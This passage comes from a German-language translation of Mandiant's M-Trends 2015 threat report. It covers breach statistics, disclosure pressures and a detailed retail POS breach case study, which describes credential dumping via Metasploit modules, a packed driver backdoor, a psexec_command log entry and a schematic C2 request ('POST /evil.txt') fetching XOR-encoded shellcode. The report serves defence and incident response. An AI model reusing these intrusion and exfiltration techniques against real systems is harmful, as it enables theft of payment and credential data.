M-Trends 2015: Ein Bericht von der Cyberfront. Sicherheitsberatung

Transkript

1 B e r i c h t z u r B e d r o h u n g s l a g e M-Trends 2015: Ein Bericht von der Cyberfront Sicherheitsberatung

2 M-Trends Ein Bericht von der Cyberfront Inhalt Einleitung... 1 Die Opfer in Zahlen Trend Nr. 1: Opfer im Rampenlicht Eine gut informierte Öffentlichkeit Steigende Erwartungen Warum werden Angriffe zunehmend bekannt gegeben?....5 Trend Nr. 2: Einzelhändler im Fadenkreuz Virtuelle Anwendungsserver als Einfallstor...7 Neue Tools, Methoden und Prozesse Mehr Angriffe auf Online-Shops in Regionen mit Chip-und-PIN-Authentifizierung....7 Empfehlungen Trend Nr. 3: Raffiniertere Angriffsabläufe Hacken von VPN Bessere Tarnung für Malware Tools und Tricks für den Kennwortdiebstahl Navigation mit WMI und PowerShell Trend Nr. 4: Die Grenzen verschwimmen Kriminelle und APT-Actors imitieren einander Im Zeichen der Unsicherheit die Absicht durchschauen kein leichtes Unterfangen Welche Rolle spielen diese Unterschiede? Schlussfolgerung Über Mandiant Über FireEye... 24

3 Einleitung Bei Mandiant sind wir seit Jahren davon überzeugt, dass es keine absolute Sicherheit geben kann. Die Ereignisse des Jahres 2014 bestätigen dies. Die Wirksamkeit der Sicherheitsmaßnah men in Unternehmen ist im vergangen en Jahr leicht gestiegen. Trotzdem geht das Wettrüsten zwischen Angreifern und Verteidigern weiter und Hacker finden ständig neue Methoden, um Sicherheitsmaßnahmen zu um gehen. In M-Trends 2014 berichteten wir, dass die Cybersecurity sich von einem Thema, an dem einige wenige IT-Verantwortliche interessiert waren, zu einer der obersten Prioritäten für die Unternehmensleitung entwickelt hatte. In diesem Jahr rückte die Cybersicherheit oder streng genommen die Cyber unsicherheit in den Blickpunkt der Öffentlichkeit. Seit Jahresbeginn 2015 wurde das Thema von US-Präsident Obama in seiner Ansprache zur Lage der Nation¹, als Grundlage für einen Hollywood-Film² und selbst in einem Gag bei der Verleihung des Gol den Globe³ aufgegriffen. Da die Berater von Mandiant nach einem schwerwiegenden Angriff oft unter den Ersten sind, die eine kritische Situation analysieren, haben wir einen besonders guten Einblick in die sich ändernden Motive und Taktiken von Hackern. Wir ar beiten seit über zehn Jahren mit Kunden in mehr als 30 Branchen weltweit zusammen. Die in diesem Dokument präsentierten Erkenntnisse und Analysen beruhen auf der Erfahrung, die wir bei der Untersuchung Hunderter kompromittierter Infrastrukturen gesammelt haben. Unternehmen haben kleine Fortschritte zu verzeichnen, doch Hacker bleiben noch immer zu lange unentdeckt, nachdem sie in eine Unternehmens umgebung eingedrungen sind. Der Mittelwert lag 2014 bei 205 Tagen, im Vergleich zu 229 Tagen im Vorjahr. Der Anteil der Unternehmen, die ein Eindringen von Hackern intern aufdeckten, ging sogar leicht zurück: 2014 wurden in 69 Prozent der von uns untersuchten Fälle die betroffenen Unternehmen von der Polizei oder einem anderen Dritten auf die Sicherheitsverletzung aufmerksam gemacht, 2013 waren es 67 Prozent und im Jahr davor 63 Prozent. Der Einzelhandel hatte mit den meisten Vorfällen zu kämpfen, da Angreifer neue Metho den zum Stehlen von Kreditkartendaten von POS-Terminals ausnutzten. In Regionen, wo Kreditkarten mit einem Prozessorchip und einer PIN geschützt sind, stieg die Anzahl der Angriffe auf E-Commerce- Unternehmen und Dienstleister, die Online- Zahlungen abwickeln. Mehrere Branchen, in denen wir bislang eher selten Vorfälle zu verzeichnen hatten, gehörten 2014 zu den wichtigsten Zielen von Internetkriminellen, darunter Unternehmens- und Beratungsservices, das Gesundheitswesen sowie Behörden und internationale Organisationen. Wenn Sicherheitsteams neue Abwehrmaßnah men installieren, finden Hacker neue Methoden, um sie zu umgehen. Das zeigte sich auch 2014, als Angreifer neue Methoden bzw. raffiniertere Versionen bekannter Methoden nutzten, um virtuelle private Netzwerke (VPN) zu hacken, unentdeckt zu bleiben, Anmeldedaten zu stehlen und über einen langen Zeitraum hinweg Zugriff auf die gehackten Umgebungen zu erhalten. Darüber hinaus ging 2014 eine Rekordzahl von Opfern der Internetkriminalität an die Öffentlichkeit. Eine der ersten Fragen, die immer ge stellt wird, war dabei schwerer zu beantworten als in der Vergangenheit: Wer war das? Die Grenzen zwischen gewöhnlichen Internetkri minellen und staatlich gesponserten Angreifern verschwimmen zunehmend, da Erstere immer raffinierter werden und Letztere oft gängige Schwarzmarkttools verwenden, um in der Szene weniger aufzufallen. Zusammenfassend lässt sich sagen, dass die Bedrohungslage derzeit komplexer ist als je zuvor. Für Sicher heitsteams bedeutet das, dass es immer schwie riger und immer wichtiger wird, Angriffsversuche zu entdecken, zu analysieren, abzuwehren und eventuelle Schäden schnell zu beheben. 1 Michael D. Shear, The New York Times, Obama to Announce Cybersecurity Plans in State of the Union Preview, Januar Sheri Linden, The Hollywood Reporter, Blackhat: Film Review, Januar Christopher Palmeri, Bloomberg, Hollywood Spoiled Brats Are Easy Targets at Golden Globes, Januar

4 M-Trends Ein Bericht von der Cyberfront Die Opfer in Zahlen Hacker nahmen 2014 ein breites Spektrum an Branchen ins Visier, darunter mehrere, die in früheren Jahren kaum von Internetkriminalität betroffen waren. Im Schnitt wurden Angriffe rascher aufgedeckt als 2013, doch die Angreifer konnten noch immer viel zu lange unbemerkt in gehackten Umgebungen ihr Unwesen treiben. Der Anteil der Opfer, die einen Angriff selbst bemerkten, ging zurück. Branchen, in denen Mandiant Angriffe untersuchte Mehrere wichtige Branchen waren bei unseren Untersuchungen deutlich stärker oder weniger stark vertreten als in den Vorjahren: Einzelhandel: Anstieg von 4 % auf 14 % Medien und Unterhaltung: Rückgang von 13 % auf 8 % 17 % Unternehmens- und Beratungsservices 7 % Juristische Dienstleister 14 % Einzelhandel 7 % IT und andere High-Tech- Branchen Mehrere Branchen, in denen wir in früheren Jahren eher selten Vorfälle untersucht hatten, gehörten 2014 zu den wichtigsten Zielen von Internetkriminellen, darunter: Unternehmens- und Beratungsservices Staatliche und internationale Organisationen Gesundheitswesen 3% 5% 10 % Finanzdienstleistungen 8 % Medien und Unterhaltung 8 % Bau- und Ingenieurwesen 6 % Gesundheitswesen 5 % Transportwesen 3 % Luft-, Raumfahrt- und Rüstungsindustrie 7 % Staatliche und internationale Organisationen 8 % Sonstige 2

5 Die Bedrohungslage im Überblick Angreifer verfolgen immer vielfältigere politische und ökonomische Ziele. Ziel Belästigung Datendiebstahl Internetkriminalität Hacktivismus Sabotage Zugriff und Verbreitung ökonomischer bzw. politischer Vorteil finanzielle Bereicherung Verleumdung, negative öffentliche Aufmerksamkeit Unterbrechung des Betriebs Beispiel Botnetze und Spam APT-Gruppen (Advanced Persistent Threat) Kreditkartendiebstahl Verunstaltung der Website Löschen von Daten Gezielter Angriff Merkmal oft automatisiert anhaltend auffällig oft opportunistisch konfliktmotiviert So werden Angriffe aufgedeckt Zeit zwischen den ersten nachweisbaren Spuren eines Angriffs bis zu seiner Feststellung 31 % der Opfer bemerkten den Vorfall unternehmensintern. 205 Tage Mittelwert der Zeitspanne, die Angreifer in gehackten Netzwerken unbemerkt blieben 69 % der Opfer wurden von einem Dritten auf den Angriff aufmerksam gemacht. 24 Tage weniger als 2013 Längste Präsenz: 2982 Tage APT-Phishing Mo 78 % der analysierten Phishing- s hatten IT- oder sicherheitsrelevante Themen als Aufhänger. Viele stammten angeblich von der IT-Abteilung des angegriffenen Unternehmens oder einem Anbieter von Antivirensoftware. 72 % der Phishing- s wurden an Arbeitstagen versandt. Di Mi Do Fr Sa So 3

6 M-Trends Ein Bericht von der Cyberfront Trend Nr. 1: Opfer im Rampenlicht Nach einem Cyberangriff finden betroffene Unternehmen sich immer häufiger im Brennpunkt eines Medienspektakels wieder und sollen alle Einzelheiten des Angriffs offenlegen. Im Verlauf des Jahres 2014 arbeiteten wir mit über 30 Unternehmen zusammen, die die Öffentlichkeit über einen Datendiebstahl informieren mussten oft im grellen Scheinwerferlicht einer Pressekonferenz. Unserer Erfahrung nach tragen bestätigte Informationen über den Umfang und die Reichweite eines Angriffs dazu bei, dass das betroffene Unternehmen kompetent und souverän erscheint. In der Regel lassen sich dadurch auch das spätere Revidieren vorangegangener Meldungen und der damit verbundene Verlust an Glaubwürdigkeit vermeiden. Eine gut informierte Öffentlichkeit Eine scheinbar endlose Kette von Meldungen über Datendiebstähle sensibilisierte die Öffent lichkeit 2014 für die Gefahren und möglichen Auswirkungen gezielter Cyberangriffe. Das führte dazu, dass bei jeder neuen Enthüllung fundiertere und detailliertere Fragen an die Opfer gestellt wurden. Die Medien, Partner, Investoren und Kunden wollen inzwischen weit mehr wissen als wann der Angriff erfolgte und welche Daten betroffen waren. Sie verlangen detaillierte Angaben über alles, vom benutzten Malwaretyp bis hin zu den Methoden, mit denen die Angrei fer sich den Zugriff auf Unternehmensressour cen offen halten konnten. Zudem stehen die Opfer von Cyberangriffen zuneh mend unter dem Druck, die Identität des Angreif ers bekannt zu geben. Wir werden häufig schon am ersten Tag einer Untersuchung gefragt, welche Hackergruppe hinter einem Angriff steckt. Zu diesem Zeitpunkt haben wir jedoch gerade erst damit begonnen, die verfügbaren Fakten zusammenzutragen. Gleichzeitig wird es immer schwerer, diese Frage überhaupt zu be antworten, da die verschiedenen Verdächtigen zunehmend dieselben Tools benutzen (siehe Trend Nr. 4: Die Grenzen verschwimmen Kriminelle und APT-Actors imitieren einander auf Seite 20). Steigende Erwartungen Da das öffentliche Interesse an Cyberangriffen steigt, wird den Verantwortlichen in betroffenen Unternehmen zunehmend klar, wie wichtig eine wirksame und konsistente Öffentlichkeitsarbeit ist, wenn Hacker in die IT-Infrastruktur des Unternehmens eingedrungen sind. Immer mehr Cyberangriffe werden öffentlich bekannt gegeben. Für die Opfer ist das mit schwierigen Ent scheidungen darüber verbunden, wie viele Details sie preisgeben möchten und diese Ent scheidungen müssen oft getroffen werden, wenn noch lange nicht alle Fakten bekannt sind. Beim Erstellen einer Strategie für die Öffentlichkeitsarbeit ist ein solides Verständnis des Ausmaßes und der Reichweite des Angriffs unverzichtbar. Nur so lassen sich das spätere Revidieren vorangegangener Meldungen und der damit verbundene Verlust an Glaubwürdigkeit vermeiden. 4

7 Beim Erstellen einer Strategie für die Öffentlichkeitsarbeit ist ein solides Verständnis des Ausmaßes und der Reichweite des Angriffs unverzichtbar. Nur so lassen sich das spätere Revidie ren vorangegangener Meldungen und der damit verbun dene Verlust an Glaubwürdig keit vermei den. Zudem fällt es vielen betroffenen Unternehmen schwer, die Berichterstattung unter Kontrolle zu behalten. Öffentliche Spekulationen darüber, wie es den Angreifern gelungen sein könnte, in ein Unternehmen einzudringen, können die Reaktion auf einen Angriff beispielsweise ernst haft behindern. Wir haben in mehreren Fällen beobachtet, dass Sicherheitsexperten bereits wertvolle Zeit mit dem Widerlegen solcher Hypo thesen verbringen mussten, noch bevor sie das Ausmaß des Angriffs abschätzen oder ihn eindämmen konnten. Warum werden Angriffe zunehmend bekannt gegeben? Wir werden oft gefragt, warum sich heute mehr Unternehmen dafür entscheiden, einen erfolgreichen Angriff bekannt zu geben. Wir können diese Frage natürlich nicht für jedes Unternehmen definitiv beantworten, aber uns sind zwei Faktoren bekannt, die diesen Trend fördern: Erstens mussten wir 2014 im Vergleich zu den Vorjahren häufiger auf Angriffe reagieren, bei denen Kreditkarten- und andere personenbezogene Daten gestohlen wurden. Viele Unternehmen müssen solche Fälle bekannt geben, weil gesetzliche Bestimmungen dies vorschreiben. Zweitens wurden 69 Prozent der Angriffe, die wir 2014 untersuchten, nicht vom Opfer selbst aufgedeckt, sondern von einem unternehmensexternen Dritten, beispielsweise einem Zulieferer, Kunden oder den Ermittlungsbehörden. Mit anderen Worten: Die Verantwortlichen in den betroffenen Unternehmen mussten davon ausgehen, dass nicht nur sie selbst und die Angreifer wussten, dass ein Angriff stattgefunden hatte. Unabhängig davon, ob die Öffentlichkeit über einen erfolgreichen Angriff informiert werden soll oder nicht, verlangen die Entscheidungs trä ger innerhalb des Unternehmens natürlich Antworten auf zahlreiche Fragen und zwar sofort. Die Untersuchung kann jedoch Wochen oder sogar Monate dauern und die zur Beantwortung dieser Fragen erforderlichen Fakten schälen sich oft erst im Verlauf der Untersuchung heraus. Deshalb ist es wichtig, das Ausmaß und die Reichweite eines Sicherheitsvorfalls zu kennen, bevor über die Strategie für die Bekanntgabe der Details entschieden wird. Fazit : Die Opfer von Cyberangriffen gehen heute mit größerer Wahrscheinlichkeit an die Öffentlichkeit als früher. Das Medieninteresse ist dabei oft groß. Reportern, Kunden und Geschäftspartnern ist zunehmend bewusst, dass nicht alle Angriffe abgewehrt werden können. Gleichzeitig verlangen sie jedoch mehr Informationen und stellen detailliertere Fragen als noch vor wenigen Jahren. Unternehmen benö tigen eine effektive Strategie für die Öffentlichkeitsarbeit, um sich auf die daraus resultieren den Diskussionen vorzubereiten. Die besten Strategien basieren auf Fakten aus der gründlichen Untersuchung des Vorfalls. 5

8 M-Trends Ein Bericht von der Cyberfront Effektive Untersuchung von Vorfällen Im Folgenden finden Sie einige häufig gestellte Fragen von Reportern, Investoren, Kunden und anderen Interessenten an Unternehmen, die Hackern zum Opfer gefallen sind. Alle Entscheidungsträger und sonstigen Personen, die für das Unternehmen sprechen, sollten die genauen Antworten auf diese Fragen verstehen, um die Verbreitung mehrdeutiger oder inkonsistenter Informationen zu vermeiden. Wie sind die Angreifer in Ihre Infrastruktur eingedrungen? Angreifer nutzen in der Regel eine Kombination aus Social Engineering und einer oder mehreren Schwachstellen, die noch nicht bekannt bzw. behoben sind. Als Einfallstor dient dabei beispielsweise ein mit dem Internet verbundener Server oder ein Malware-Anhang in einer , der echt genug aussieht, um vom Empfänger geöffnet zu werden. Manche Angreifer infizieren sogar Websites, die von ihren anvisierten Opfern häufig besucht werden. Es ist wichtig, dass ein Unternehmenssprecher erklären kann, wie die Angreifer in die Infrastruktur des Unternehmens eingedrungen sind. Noch wichtiger ist möglicherweise, dass er oder sie auch sagen kann, ob dieses Einfallstor geschlossen und die Bedrohung eingedämmt wurde. Wie haben die Angreifer sich den Zugang zu Ihrer Infrastruktur offengehalten? Angreifer versuchen meist, sich dauerhaften Zugang zu einer Umgebung zu verschaffen. Um sie vollständig aus Ihrer Infrastruktur zu entfernen, müssen Sie alle genutzten Einfallstore finden und schließen. Zu den meistgenutzten Einfallstoren gehören sogenannte Backdoors, Webshells sowie der Zugang zu Ihrem VPN und anderen Systemen für den Fernzugriff. Wie ist der Angriff abgelaufen? Wenn Sie nachvollziehen können, wie ein Angreifer in Ihre Infrastruktur eindringen und Daten stehlen konnte, haben Sie den ersten Schritt zur künftigen Abwehr ähnlicher Angriffe getan. Außerdem ist es schwierig, die Auswirkungen eines Angriffs zu ermitteln und zu beheben, wenn Sie das genaue Ausmaß des Angriffs nicht kennen. Welche Daten wurden gestohlen? Um herauszufinden, welche Daten die Angreifer kopiert und entwendet haben, ist meist eine forensische Analyse der betroffenen Systeme erforderlich. Mitunter kann selbst eine solche Analyse diese Frage nicht vollständig beantworten. Sie sollten in jedem Fall Ihre Rechtsabteilung einbeziehen, um zu ermitteln, welche gesetzlichen Verpflichtungen sich aufgrund der Art der gestohlenen bzw. möglicherweise gestohlenen Daten für Ihr Unternehmen ergeben. Haben Sie den Vorfall eingedämmt? Wer die ersten vier Fragen beantworten kann, hat gute Voraussetzungen für die Beantwortung dieser Frage. Wenn Sie den Plan der Angreifer und den Verlauf des Angriffs aufgedeckt haben, können Sie besser auf den Angriff reagieren und mit der Schadensbehebung beginnen. 6

9 Trend Nr. 2: Einzelhändler im Fadenkreuz Allein im Jahr 2014 wurden bei über 1000 Einzelhändlern Kundendaten gestohlen, sodass unzählige Kunden ihre Kreditkarten ersetzen lassen mussten. 4 Neben der riesigen Anzahl der Angriffe fielen unseren Analysten auch mehrere neue Angreifergruppen auf, die diese gebeutelte Branche mit speziellen Tools und Methoden ins Visier nehmen. Virtuelle Anwendungsserver als Einfallstor Mithilfe der Anwendungsvirtualisierung lassen sich virtuelle Desktops konfigurieren, bei denen Benutzer sich per Fernzugriff anmelden, um ei nen begrenzten Zugriff auf bestimmte Program me zu erhalten. Bei korrekter Konfiguration ist ein virtueller Desktop vollständig von dem physi schen Server abgeschirmt, auf dem er ausgeführt wird. Die Benutzer kommen also nicht aus dem virtuellen Desktop heraus und haben keinen direkten Zugriff auf den physischen Server. In manchen Fällen entstehen jedoch schon durch kleine Konfigurationsfehler Lücken in der Abschirmung, die es Angreifern ermöglichen, aus der virtuellen Umgebung auszubrechen und sich direkten Zugriff auf den physischen Server zu verschaffen. In jedem von uns untersuchten Fall mit diesem Angriffsmuster wurde dieselbe Schwachstelle ausgenutzt: Für den Fernzugriff auf die Anwen dung waren nur ein Benutzername und Kenn wort erforderlich. Mit Zwei-Faktor-Authentifizierung lässt sich dieses Einfallstor nahezu vollständig schließen. Neue Tools, Methoden und Prozesse Die von uns beobachteten neuen Angreifergruppen nutzten auch neue Tools, Methoden und Prozesse. Die Expertise der Angreifer deckte das gesamte Spektrum ab, von Anfängern mit gängigen Schwarzmarkttools bis hin zu technisch versierten Gruppen mit raffinierter, speziell auf be stimmte POS-Systeme abgestimmter Malware zum Abschöpfen von Kreditkartendaten. Wir konnten keinen Zusammenhang zwischen den Fähigkeiten und dem Erfolg der Angreifer feststellen. Insbesondere für US-amerikanische Einzelhändler erwies sich Standardmalware vom Schwarz markt für den Diebstahl von Kreditkartendaten als ebenso gefährlich wie professionelle Produkte. Jede der von uns untersuchten Angreifergruppen konnte die Umgebung ihres Opfers unbemerkt ausspionieren, sich Zugang zu den POS-Terminals verschaffen und die Malware für den Diebstahl der Kreditkartendaten installieren. Mehr Angriffe auf Online-Shops in Regionen mit Chip-und-PIN- Authentifizierung Während POS-Terminals in Europa und vielen anderen Regionen längst einen in der Kreditkarte enthaltenen Prozessorchip und eine PIN zur Authentifizierung nutzen, hat sich das nach sei nen Entwicklern Europay, MasterCard und Visa benannte EMV- Verfahren in den USA noch immer nicht durchgesetzt. Das soll sich nun endlich ändern. EMV-fähige Kreditkarten generieren einen eindeutigen Code für jede Transaktion und erschweren Hackern das Fälschen von Trans aktionen dadurch erheblich. Möglicherweise konzentrieren sich Cyber kriminelle stattdessen auf leichtere Beute. In Ländern, in denen standardmäßig EMV verwendet wird, untersuchten wir 2014 im Vergleich zu früheren Jahren eine größere Anzahl von Angriffen auf E-Commerce-Unternehmen und Dienstleister, die Online-Zahlungen abwickeln. 4 U.S. Department of Homeland Security and U.S. Secret Service: Backoff Malware: Infection Assessment, August

10 M-Trends Ein Bericht von der Cyberfront Fallstudie Bei einem Hackerangriff auf eine große US-amerikanische Kaufhauskette wurden die Daten von Millionen von Kreditkarten gestohlen Dieser Angriff ist typisch für eine Ma sche, der 2014 eine Reihe US-amerika nischer Einzelhändler zum Opfer fielen: Die Angreifer verschafften sich mit gültigen Anmeldedaten per Fernzugriff Zugang zu einem System des Opfers und nutzten dann dessen Intranet, um Malware auf den POS-Terminals in den Ladengeschäften zu installieren. Im hier beschriebenen Fall bemerkte das Opfer den Angriff erst, als Behörden drei Mo nate später darauf aufmerksam machten. Eindringen in das Netzwerk Der Angreifer meldete sich mit gültigen Anmeldedaten bei einem Anwendungsserver der Kaufhauskette an und erhielt einen virtuellen Desktop mit begrenzten Privilegien. Wir konnten keine Anzeichen für fehlgeschlagene Anmeldeversuche finden und gehen daher davon aus, dass er sich die Anmeldedaten vor dem Angriff beschafft hatte. Wie ihm das gelang, geht aus den uns vorliegenden Daten nicht hervor. Der Angreifer nutzte dann einen klei nen Fehler in der Konfiguration des virtuellen Desktops aus, um sich zusätzliche Zugriffsrechte zuzuweisen, darun ter Zugang zu einem Befehlszeilentool, mit dem er direkt auf dem Anwendungs server Befehle ausführen konnte. Damit lud er über Windows FTP ein Tool zum Kopieren von Kennwörtern herunter, mit dem er in den Besitz des Administratorkennworts für den Anwendungsserver gelangte. Alle Syste me im Intra net der Kaufhauskette nutzten dasselbe Administratorkennwort. All das dauerte nur wenige Minuten. Ausspionieren und Infizieren des Netzwerks Der Angreifer nutzte zunächst das Framework Metasploit, um die Infra struktur des Opfers auszuspionieren. Metasploit ist ein Open-Source-Framework für Penetrationstests, das eine riesige Auswahl an Modulen zum Aufdecken und Ausnutzen von Schwachstellen enthält. Dank dieser Vielfalt erfre ut es sich sowohl bei Sicherheitsexperten als auch bei Internetkriminellen großer Beliebtheit. Im vorliegenden Fall wurde das Modul psexec_command genutzt, mit dem Be fehle als Windows-Service auf einem anderen System ausgeführt werden können. Alle Aktionen von psexec_command werden in den Logdateien des Systems protokolliert, auf dem sie ausgeführt werden. Der Angreifer durchsuchte weiterhin Systeme im Intranet, konzentrierte sich aber zunehmend auf den Domänencontroller der Zentraldomäne des Unternehmensnetzwerks. Ein Domänencontroller ist ein Server, der zur Administration der Authentifizierung in einer Windows-Umgebung benötigt wird. Dieser Domänencontroller hatte dasselbe Administratorkennwort wie der zuerst gehackte Server und war daher eine leichte Beute. Der Angreifer nutzte das Metasploit-Modul ntdsgrab, um die NTDS-Datenbank und System Registry Hive zu kopieren. Die NTDS-Datenbank enthält für den Domänencontroller wichtige Daten über Active Directory, unter anderem Benutzernamen und Kennwort-Hashes. Das Modul ntdsgrab nutzt den Volume Shadow Copy Service (VSS), um eine Schattenkopie der Partition zu erstellen, auf der die NTDS-Datenbank gespei chert ist. Der eigentl iche Zweck von VSS ist das Erstellen legitimer Momentaufnahmen für die Datensicherung und -wiederherstellung. Der Angreifer missbrauchte den Dienst jedoch, um die NTDS-Datenbank zu stehlen. Im Anschluss nutzte er andere Tools, um die Kennwort-Hashes der Domänenadministratoren zu finden und zu knacken. Damit stand ihm praktisch die gesamte Umgebung offen. Der Angreifer stieg nun auf altbewährte Methoden zum Ausspionieren von Netzwerken um, darunter nicht interaktive Anmeldeversuche, das Tool PsExec aus den Microsoft SysInternals und Anmeldeversuche über das Remote Desktop Protocol (RDP). Nachdem er sich mit den Anmeldedaten des Domänenadministrators auf einem virtualisierten Anwendungsserver angemeldet hatte, konnte der Angreifer sich via RDP mit umfangreichen Zugriffsrechten auf anderen Systemen einloggen. Einrichten von Backdoors Der Angreifer richtete auf mehreren gehackten Systemen Hintertüren ein, um sich dauerhaft Zugang zu ihnen zu sichern. Dazu nutzte er einen schädlichen Gerätetreiber, der speziell für Windows XP entwickelt wurde. Dieser Gerätetreiber wurde zur Übertragung mit einem raffinierten Packer komprimiert, der vergleichbaren Tools in hoch entwickelter, aber gängiger Malware ähnelte. Der Gerätetreiber extrahiert sich zunächst im Arbeits speicher und startet dann einen neuen System-Thread. Daraufhin schickt der entsprechende legitime Gerätetreiber eine Nachricht an das System, dass er nicht geladen werden konnte. Da die Malware in einem anderen Prozess ausgeführt wird als der legitime Gerätetreiber, erkennt das System den zusätzlichen Gerätetreiber nicht. Durch diese Verschleie rungstaktik wird die Analyse der Malware und ihrer Funktionen erschwert. 8

11 So funktioniert psexec_command Der auszuführende Befehl und eine Textdatei für die Ausgabe werden in eine Windows-Batchdatei geschrieben. Die Ausgabe- und die Batchdatei erhalten von einem Zufallsgenerator generierte Namen, die je 16 Zeichen lang sind. Die Batchdatei wird ausgeführt. Abbildung 1 zeigt, was dabei im Systemereignisprotokoll von Windows aufgezeichnet wird. A service was installed in the system. Service Name: MRSWxwQmQxFGumEFsW Service File Name: %COMSPEC% /C echo dir ^> %SYS- TEMDRIVE%\WINDOWS\Temp\TthwsVKvUhydrsNB.txt > \ WINDOWS\Temp\RbhRmgALAHcdyWXG.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\RbhRmgALAHcdyWXG. bat Service Type: user mode service Service Start Type: demand start Abbildung 1: Das Metasploit-Modul psexec_command installiert einen Service. Die Funktionen dieser Backdoor befinden sich in Shellcode, den der Gerätetreiber in Prozesse einschleust, die im Benutzerbereich, also außerhalb des Windows- Kernels, ausgeführt werden. Dieser Shellcode schickt dann eine HTTP-POST-Abfrage an eine hartkodierte IP-Adresse und lädt einen HTML-Kommentar herunter, der mit XOR kodierten Shellcode enthält. Dank dieser Methode war die Backdoor sehr vielseitig einsetzbar. Wenn der Angreifer neue Funktionen benötigte, konnte er einfach neuen Shellcode herunterladen und ausführen. Diese Nutzung von Shellcode ist nicht neu, aber durch die Kombination mit dem Packer war sie wesentlich schwerer zu finden als ältere Varianten. Abbildung 2 zeigt die Kommunikation zwischen der Backdoor und dem Command-und-Control-Server (CnC- Server). Datendiebstahl Nachdem er das Kennwort des Domänenadministrators geknackt hatte, stand dem Angreifer die gesamte Windows-Umgebung der Kaufhauskette offen. POST /evil.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Evil_UA_String Host: Pragma: no-cache <POST_DATA> gehacktes System Backdoor schickt HTTP-POST- Abfrage an CnC-Server. Mit XOR kodierter Shellcode wird heruntergeladen und ausgeführt. CnC-Server des Angreifers <!-XOR_Encoded_Shellcode --> Abbildung 2: Kommunikation zwischen CnC-Server und Backdoor 9

12 M-Trends Ein Bericht von der Cyberfront Alle POS-Terminals in der gesamten Kaufhauskette nutzten denselben Domänencontroller für die Authentifizierung. Wer also Zugang zum Domänencontroller der Verkaufsdomäne hatte, konnte direkt auf alle POS-Terminals zugreifen. Er konzentrierte sich jedoch auf die Verkaufsumgebung. Diese Umgebung war wie folgt konfiguriert: Zwischen der Verkaufsdomäne und der Zentraldomäne des Unternehmens war ein Two-Way-Trust konfiguriert. Auf den POS-Terminals lief Microsoft Windows XP. Die POS-Terminals waren mit der Verkaufsdomäne verbunden. Diese im Einzelhandel weit verbreitete Konfiguration hat zwei Schwachpunkte, die der Angreifer ausnutzen konnte. Erstens konnte er die zuvor erbeuteten Anmeldedaten des Domänenadministrators der Zentraldomäne nutzen, um privilegierten Zugriff auf die Verkaufsdomäne zu erlangen. Zweitens war die Verkaufsdomäne eine untergeordnete Domäne der Zentraldomäne. Manche Funktionen funktionierten nur, wenn bestimmte wichtige Ports zwischen der Zentral- und Verkaufsdomäne offen blieben. Über diese offenen Ports konnten jedoch alle Firewall-Kontrollen der Kaufhauskette um gangen werden. Der Angreifer nutzte diese offenen Ports, um auf den Domänencontroller zuzugreifen und von dort in die Verkaufsdomäne zu gelangen. Alle POS-Terminals in der gesamten Kaufhauskette nutzten denselben Domänencontroller für die Authentifizie rung. Wer also Zugang zum Domänencontroller der Verkaufsdomäne hatte, konnte direkt auf alle POS-Terminals zugreifen. Der Angreifer nutzte eine Windows-Batchdatei auf dem Domä nencontroller der Verkaufsdomäne, um alle POS-Terminals in der gesamten Kaufhauskette mit Malware zum Stehlen von Kreditkartendaten zu infizieren. Der Angreifer führte die Malware als geplante Windows-Aufgabe aus. Die auf den POS-Terminals installierte Malware las die auf dem Magnetstreifen der Kreditkarten gespeicherten Kartennummern und das Ablaufdatum sowie weitere Transaktionsdetails aus dem Prozessspeicher der POS-Anwendung aus und sammelte sie. Angreifer können diese Daten an andere Kriminelle verkaufen, die Kreditkarten fälschen. Zum Erfassen der Kreditkarten- und Transaktionsdaten nutzte die Malware OSQL, ein befehlszeilenbasiertes Tool für SQL-Abfragen, das bereits auf den POS- Terminals installiert war. Die gestohlenen Daten wurden dann in einer temporären MSSQL-Datenbank namens tempdb gespeichert. Wenn MSSQL gestoppt wird, werden alle Daten in tempdb automatisch gelöscht. Einmal täglich startete der Angreifer eine SQL-Abfrage, um die Daten aus den tempdb aller POS-Terminals in einer Textdatei auf dem Domänencontroller zu speichern. Dort archivierte er die Textdatei und schickte sie an eine mit dem Internet verbundene Workstation in der Verkaufsdomäne. Von dieser Workstation aus konnte er die archivierte Datei mit den gestohlenen Daten per FTP an einen von ihm kontrollierten Server schicken. Abbildung 3 stellt den Verlauf des Angriffs grafisch dar. 10

13 1 Der Angreifer meldet sich mit gültigen Anmeldedaten per Der Angreifer überträgt die Fernzugriff an einem Server des Opfers an, auf dem eine 4 gestohlenen Daten von den virtualisierte Anwendung läuft. POS-Terminals über den Domänencontroller der Verkaufsdomäne auf eine Angreifer Benutzer-Workstation in erster Zugriff Ausschleusen der Daten via FTP derselben Domäne. Von dort überträgt er sie mit FTP auf einen externen Server. Kommunikation mit dem CnC-Server Zentraldomäne Verkaufsdomäne Laden 1 DMZ Benutzer- Workstation Benutzer- Workstation POS-Terminal1 POS-Terminal 2 virtueller Anwendungsserver Hauptdomänencontroller Domänencontroller der Verkaufsdomäne POS-Terminal 1 POS-Terminal 2 Laden 2 Der Angreifer bricht aus der virtualisierten Der Angreifer nutzt den Domänencontroller 2 Anwendungsumgebung aus und erkundet das der Verkaufsdomäne, um auf die POS-Terminals zuzugreifen und sie mit Malware zum Unternehmensnetzwerk. Dort erbeutet er Anmeldedaten für weitere Systeme. Stehlen von Kreditkarten- und Transaktionsdaten zu infizieren. 3 Abbildung 3: Verlauf des Angriffs 11

14 M-Trends Ein Bericht von der Cyberfront Empfehlungen Der in der Fallstudie beschriebene Angriff wäre so in Europa nicht möglich, doch auch hier rollt eine regelrechte Lawine von Angriffen auf Online-Händler und andere Unternehmen zu, die Online-Transaktionen abwickeln. Sie können nicht jeden Angriff abwehren, doch die folgenden Maßnahmen erschweren es Angreifern, in Ihre Umgebung einzudringen und diese auszuspionieren. Mit den richtigen Tools und einem wachsamen Sicherheitsteam können Sie den Verlauf eines Angriffs verlangsa men. Dadurch gewinnen Sie Zeit, um den Angriff aufzudecken, zu untersuchen und zu reagieren, bevor der Angreifer sein Ziel erreicht hat. Sicherer Fernzugriff Analysieren Sie, mit welchen Methoden Ihre Angestellten, externe Mitarbeiter und Zulieferer per Fernzugriff auf Ihre Infrastruktur zugreifen. Bemühen Sie sich, die Anzahl der verfügbaren Zugriffsmethoden, die Anzahl der autori sierten Nutzer und alle anderen Aspekte des Fernzugriffs auf ein kontrollierbares Maß einzuschränken. Legen Sie Richtlinien für starke Kennwörter fest und stellen Sie alle 